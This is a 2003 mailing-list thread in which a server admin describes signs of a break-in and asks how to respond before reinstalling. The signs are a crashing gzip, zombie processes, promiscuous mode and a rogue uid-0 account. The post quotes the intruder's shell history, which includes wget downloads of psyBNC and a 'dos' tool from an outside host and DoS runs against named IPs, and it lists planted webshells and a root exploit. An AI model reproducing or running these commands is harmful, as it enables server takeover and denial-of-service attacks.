On Wed, 17 Sep 2003 22:29:58 +0200 Markus Schabel <[EMAIL PROTECTED]> wrote:
I've seen some strange things on my (stable with security-updates) server: the last apt-get update didn't work because gzip segfaultet. I've copied gzip from another server over the version on this server, but it also crashed. Interesting was that the executable was bigger after the segfault.
curious.
In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no idea where they come from.
it's the daily cronjob that stole.
yes, and that's reproducable :(
You think the server got hacked? Are there any other things that can lead to this? man also behaves strange, it says either "No manual entry for...", "What manual page do you want?" or nothing.
i'm thinking about a hardware problem. may the harddrive is in failure (get the ouput of dmesg) or a very big
ram problem that corrupt files on the hard drive.
request_module[net-pf-14]: waitpid(15400,...) failed, errno 1 ptrace uses obsolete (PF_INET,SOCK_PACKET) eth0: Promiscuous mode enabled. device eth0 entered promiscuous mode eth0: Promiscuous mode enabled.
but nothing about the disks
in every case simply copy all the data you can and inspect the hdd in another box mounting it read only.
setuid.changes lists /dev/* and the following programs: pppd postdrop postqueue wall newgrp at chage chfn chsh expiry gpasswd passwd write crontab dotlockfile ssh-keysign procmail lockfile popauth pt_chown traceroute mount umount login su ping suexec /usr/lib/mc/bin/cons.saver
and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
in /etc/.rpn theres a .bash_history with the following content:
id mkdir /etc/.rpn ps -aux ps -aux | grep tbk kill -15292 pid kill 15292 netconf locate httpd.conf cd /etc/.rpn ls -al wget cd /var/www/cncmap/www/upload/renegade ls -al rm -rf phpshell.php cat bd.c gcc -o bd bd.c ftp ftp.hpg.com.br rm -rf bd.c cd /tmp cd /etc/.rpn wget www.slacks.hpg.com.br/psyBNC.tar.gz tar zvxf psyBNC.tar.gz tar -zvxf psyBNC.tar.gz tar gunzip psyBNC.tar.gz tar -Acdtrux psyBNC.tar.gz tar -x psyBNC.tar.gz tar -Acd psyBNC.tar.gz tar -cd psyBNC.tar.gz tar --help pwd ls rm -rf * wget www.slacks.hpg.com.br/bin/dos chmod +x dos ./dos ./dos 200.101.87.8 65535 8569 ./dos 200.199.95.11 65535 8569
and the executable dos
interesting is the line "tar --help" :D
in "last" I see the following:
slacks pts/0 Sun Sep 14 02:26 - 03:37 (01:11) 200-147-107-35.tlm.dialuol.com.br
IP of the hacker is 200.147.107.35 I think we have no chance of legal actions against .br?
in the directory /var/www/cncmap/www/upload/renegade there are the
following files: backhole.pl
e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, LES-EXPLOIT for Linux x86")
rem.php (phpRemoteView)
so we got hacked :(
what informations should we gather before we reinstall the complete server? I think we have to reinstall the whole thing or do you have any ideas?
thanks Markus
-- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
